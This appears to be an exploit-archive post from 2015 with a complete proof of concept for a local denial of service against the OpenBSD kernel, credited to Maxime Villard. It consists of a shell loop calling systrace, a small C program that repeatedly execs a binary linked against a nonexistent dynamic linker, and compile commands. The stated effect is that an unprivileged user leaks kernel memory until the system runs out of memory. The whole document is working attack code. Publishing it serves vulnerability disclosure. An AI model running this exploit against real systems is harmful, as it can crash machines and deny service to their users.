OpenBSD Local Denial Of Service
Posted on 03 August 2015
/* * 2015, Maxime Villard * Exploit triggering a memory leak in the OpenBSD kernel from an unprivileged * user. Found by The Brainy Code Scanner. */ - - - - - - - - - - - - - - - - - script.sh - - - - - - - - - - - - - - - - - - #! /bin/sh while true do systrace -A ./exploit done - - - - - - - - - - - - - - - - - exploit.c - - - - - - - - - - - - - - - - - - #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char *argv[]) { execve("bin", argv, NULL); } - - - - - - - - - - - - - - - - - - bin.c - - - - - - - - - - - - - - - - - - - int main() {} - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - $ gcc -o exploit exploit.c $ gcc -Wl,-dynamic-linker,/DEAD -o bin bin.c $ ./script.sh Wait a bit, and the kernel will run out of memory.